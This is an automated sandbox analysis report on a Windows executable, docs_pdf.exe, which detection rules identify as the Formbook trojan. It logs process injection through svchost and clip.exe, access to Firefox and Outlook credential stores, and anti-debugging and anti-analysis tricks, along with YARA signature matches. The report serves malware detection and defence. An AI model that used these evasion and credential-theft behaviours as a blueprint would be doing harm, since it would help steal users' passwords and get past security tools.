            Source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@9/5
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101A2D5 GetLastError,FormatMessageW,0_2_0101A2D5
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01008713 AdjustTokenPrivileges,CloseHandle,0_2_01008713
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01008CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_01008CC3
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0101B59E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0102F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0102F121
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0101C602
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FB4FE9
            Source: C:\Users\user\Desktop\docs_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\aut89B4.tmpJump to behavior
            Source: docs_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000003.00000003.2015132691.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2913704315.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2015132691.0000000002BD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: docs_pdf.exeReversingLabs: Detection: 44%
            Source: unknownProcess created: C:\Users\user\Desktop\docs_pdf.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: docs_pdf.exeStatic file information: File size 1190400 > 1048576
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: docs_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765523436.0000000000BAE000.00000002.00000001.01000000.00000004.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906921154.0000000000BAE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: docs_pdf.exe, 00000000.00000003.1671817009.0000000003700000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.1669880230.0000000003510000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753116233.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751590733.0000000003000000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.0000000004850000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1844741121.00000000046A5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1842535951.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: docs_pdf.exe, 00000000.00000003.1671817009.0000000003700000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.1669880230.0000000003510000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1842619722.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753116233.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751590733.0000000003000000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.2915473756.0000000004850000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1844741121.00000000046A5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1842535951.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1842505416.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1811670613.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914301789.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2916160322.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1907126473.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.000000000594C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2916160322.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1907126473.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.000000000594C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1842505416.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1811670613.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914301789.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: docs_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0102C304 LoadLibraryA,GetProcAddress,0_2_0102C304
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01018719 push FFFFFF8Bh; iretd 0_2_0101871B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDE94F push edi; ret 0_2_00FDE951
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDEA68 push esi; ret 0_2_00FDEA6A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD8B85 push ecx; ret 0_2_00FD8B98
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDEC43 push esi; ret 0_2_00FDEC45
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDED2C push edi; ret 0_2_00FDED2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031C0 push eax; ret 1_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004161D3 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162CC push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417356 push ebx; retf 1_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416338 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004083DA push es; ret 1_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040BBEC pushad ; iretd 1_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418577 push 2823B84Bh; retf 1_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D38 push ecx; iretd 1_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E39 push esp; ret 1_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340225F pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034027FA pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx1_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340283D push eax; iretd 1_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340135E push eax; iretd 1_2_03401369
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037E6246 push edi; ret 2_2_037E6247
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037E62C7 push FFFFFFB8h; retf 2_2_037E62C9
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037EB940 push ecx; retf 2_2_037EB941
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037E0919 push 2823B84Bh; retf 2_2_037E0929
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037DA1DB push esp; ret 2_2_037DA1E3
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037EB1AE push ecx; iretd 2_2_037EB1AF
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037E00DA push ecx; iretd 2_2_037E00DB
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037D077C push es; ret 2_2_037D0780
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FB4A35
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010355FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_010355FD
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FD33C7
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI/Special instruction interceptor: Address: F83224
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9805Jump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98893
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep count: 167 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep time: -334000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep count: 9805 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep time: -19610000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe TID: 2008Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01014696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_01014696
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C93C FindFirstFileW,FindClose,0_2_0101C93C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0101C9C7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101F35D
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101F200
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0101F65E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01013A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01013A2B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01013D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01013D4E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0101BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0279BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_0279BC20
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FB4AFE
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2914430659.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
            Source: firefox.exe, 00000008.00000002.2122684152.00000179057ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-97598
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-97667
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004173E3 LdrLoadDll,1_2_004173E3
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010241FD BlockInput,0_2_010241FD
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FB3B4C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FE5CCC
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0102C304 LoadLibraryA,GetProcAddress,0_2_0102C304
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00F834F0 mov eax, dword ptr fs:[00000030h]0_2_00F834F0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00F83490 mov eax, dword ptr fs:[00000030h]0_2_00F83490
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00F81E70 mov eax, dword ptr fs:[00000030h]0_2_00F81E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
